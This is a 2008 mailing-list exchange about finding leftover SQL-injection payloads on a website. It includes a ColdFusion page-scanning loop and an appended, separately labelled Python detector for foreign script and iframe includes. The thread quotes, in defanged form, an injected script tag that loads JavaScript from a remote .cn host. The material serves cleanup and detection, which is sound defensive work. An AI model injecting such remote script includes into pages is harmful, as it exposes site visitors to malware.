Thanks Brad!  I ran a string search through the entire database and was
able to find a couple records that still had scripts in them.  Hopefully
I got all of them... I searched for "script", ".js" etc...   just
requested another review, keeping fingers crossed.

Thanks!

-----Original Message-----
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Thursday, October 09, 2008 6:57 PM
To: cf-talk
Subject: Re: attack site / sql injections HELP!

Tim, I have confirmed you do in fact still have at least one page on your
site with malicious content.  I just created a simple script which hit every
page Google has for your site and briefly analyzed the source.

I googled for "site:connhisto.org"

I then copied and pasted the 24 links into a list and ran this code:
<cfoutput>

 <!--- "~"-delimited list of the 24 URLs Google returned, one per line;
       trim() in the loop strips the line breaks and indentation --->
 <cfset sites = "
  http://www.connhisto.org/~
  http://www.connhisto.org/index.cfm?p=10~
  http://www.connhisto.org/index.cfm?p=3&pid=4231~
  http://www.connhisto.org/index.cfm?p=3&pid=4233~
  http://www.connhisto.org/index.cfm?p=3&pid=4221~
  http://www.connhisto.org/index.cfm?p=3&pid=4234~
  http://www.connhisto.org/index.cfm?p=3&pid=4224~
  http://www.connhisto.org/index.cfm?p=10&documentid=6309&q=1~
  http://www.connhisto.org/index.cfm?p=10&documentid=6321&q=1~
  http://www.connhisto.org/index.cfm?p=4&pid=4221&spid=4222~
  http://www.connhisto.org/index.cfm?p=4&pid=4220&spid=4259~
  http://www.connhisto.org/index.cfm?p=11~
  http://www.connhisto.org/index.cfm?p=7~
  http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4228~
  http://www.connhisto.org/index.cfm?p=3&pid=4220~
  http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4226~
  http://www.connhisto.org/index.cfm?p=10&documentid=6291&q=1~
  http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4229~
  http://www.connhisto.org/index.cfm?p=4&pid=4221&spid=4223~
  http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4230~
  http://www.connhisto.org/index.cfm?p=10&documentid=6318&q=1~
  http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4225~
  http://www.connhisto.org/index.cfm?p=10&documentid=6316&q=1~
  http://www.connhisto.org/index.cfm?p=4&pid=4220&spid=4261">

 <cfloop list="#sites#" index="site" delimiters="~">
  <!--- Fetch the page and print its URL and HTTP status --->
  <cfhttp url="#trim(site)#"></cfhttp>
  #trim(site)# (#cfhttp.statuscode#)<br>
  <!--- Flag any page whose source mentions a .js file or a .htm link --->
  <cfif cfhttp.filecontent contains ".js" or cfhttp.filecontent contains ".htm">
   <span style="color:red">Bad!</span><br>
  <cfelse>
   <span style="color:green">Good!</span><br>
  </cfif><br>

 </cfloop>

</cfoutput>

This code is way too generic and wouldn't work on most sites, but since you
don't seem to have ANY .js files or .htm links, it was relatively easy to
find your bad apple.

THIS PAGE (don't click!  Spaces added to prevent auto-linking):
http:// www. connhisto. org/ index.cfm? p=3& pid=4220

has this script (don't click!  Spaces added to prevent auto-linking):
<script src="http:/ /sdo. 1000mg. cn/ csrss/ w.js"></script><!--
Immediately following this text:
If you have a job opening you would like to list on our site, please e-mail Amos
You should clean that page or the database table that populates it.

~Brad 
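
Added example (not part of the original thread and not Brad's code): a less generic version of the same page check, in Python, that parses each page and flags only script or iframe tags whose src points at a host the site does not own, so a legitimate local .js file or .htm link is not reported. It goes beyond the thread by also watching iframe tags; the page URL, host names, sample HTML and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tags whose src attribute makes the browser load remote content.
WATCHED = {"script", "iframe"}


class IncludeCollector(HTMLParser):
    """Collects (tag, absolute_url) for every watched tag that has a src."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.includes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <SCRIPT SRC=...> matches too.
        src = dict(attrs).get("src")
        if tag in WATCHED and src:
            # Resolve relative and protocol-relative (//host/x.js) references.
            self.includes.append((tag, urljoin(self.page_url, src.strip())))


def find_foreign_includes(page_url, html, allowed_hosts):
    """Return includes whose host is not in allowed_hosts (lower-case names)."""
    collector = IncludeCollector(page_url)
    collector.feed(html)
    collector.close()
    return [(tag, url) for tag, url in collector.includes
            if (urlparse(url).hostname or "") not in allowed_hosts]


# Constructed sample: one local script, one .htm link, and one injected script
# followed by an unclosed HTML comment, the pattern quoted in the message above.
PAGE_URL = "http://www.site.example/index.cfm?p=3"
SAMPLE_HTML = (
    '<html><head><script src="/js/menu.js"></script></head><body>'
    '<a href="about.htm">About</a>'
    '<p>Please e-mail us.<SCRIPT SRC="http://injected.example/w.js"></SCRIPT><!--'
    '</p></body></html>'
)

if __name__ == "__main__":
    for tag, url in find_foreign_includes(PAGE_URL, SAMPLE_HTML, {"www.site.example"}):
        print(f"Bad! <{tag}> loads {url}")
```
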




Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:313731